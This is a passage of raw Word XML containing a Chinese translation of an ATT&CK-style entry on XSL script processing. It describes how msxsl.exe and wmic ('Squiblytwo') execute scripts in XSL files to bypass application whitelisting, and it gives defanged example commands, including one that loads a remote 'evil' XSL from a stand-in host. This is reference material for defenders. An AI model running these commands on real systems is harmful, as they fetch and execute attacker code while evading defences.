              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000F2665" w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
            <w:r w:rsidR="000F2665" w:rsidRPr="00ED5496">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="000F2665" w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D95FA6A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DB4ACD7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>微软核心</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XML</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务（</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>MSXML</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）或访问</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t>wmic.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7757A95D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79095F40" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程命令行参数，进程使用网络，动态链接库监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77980DDC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程支持：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F58BB9E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：杀毒软件</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数字证书验证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A225845" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t>Casey Smith; Praetorian</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02A10791" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:lastRenderedPageBreak/>
              <w:t>版本</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76ABF780" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007D0200" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="555555"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26D8F4FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3B0511" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>扩展样式表语言（</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xsl</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）文件通常用于描述</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文件中数据的处理和呈现。为了支持复杂的操作，</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xsl</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>标准包括对各种语言的嵌入式脚本的支持。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3E4CBF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可能会滥用此功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>执行任意文件，同时可能绕过应用程序白名单防御。与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的开发工具</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>类似，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>微软</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>公用线转换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>msxsl.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）可以安装并用于执行嵌入在本地或远程（引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>xsl</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>文件中的恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。由于默认情况下未安装</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>msxsl.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者可能需要使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>丢弃文件</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>对其进行打包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041300B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>命令行示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680E872D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>msxsl.exe customers[.]xml script[.]xsl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1064B360" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这种技术的另一种变体称为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Squiblytwo</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”，它使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>管理工具在</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xsl</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文件中调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>JScript</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>VBScript</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。这项技术与</w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00ED5496">
          <w:t>Regsvr32</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sq</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uiblydoo</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，也通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一个可信的内置</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>工具执行本地</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>远程脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02421E2E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7107">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>命令行示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C75F2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Local File:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>wmic proc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50959756" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ess list /FORMAT:evil[.]xsl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DBA798" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009B7107" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="39434C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Remote File:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>wmic os get /FORMAT:"https[:]//example[.]com/evil[.]xsl"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B93488" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>行示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2115BB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
